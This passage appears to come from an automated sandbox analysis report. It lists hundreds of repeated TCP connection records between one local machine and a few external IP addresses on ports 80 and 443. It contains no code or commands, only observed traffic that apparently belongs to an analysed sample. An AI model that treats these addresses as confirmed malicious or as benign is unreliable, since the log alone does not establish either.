                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 163.172.115.127:80 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
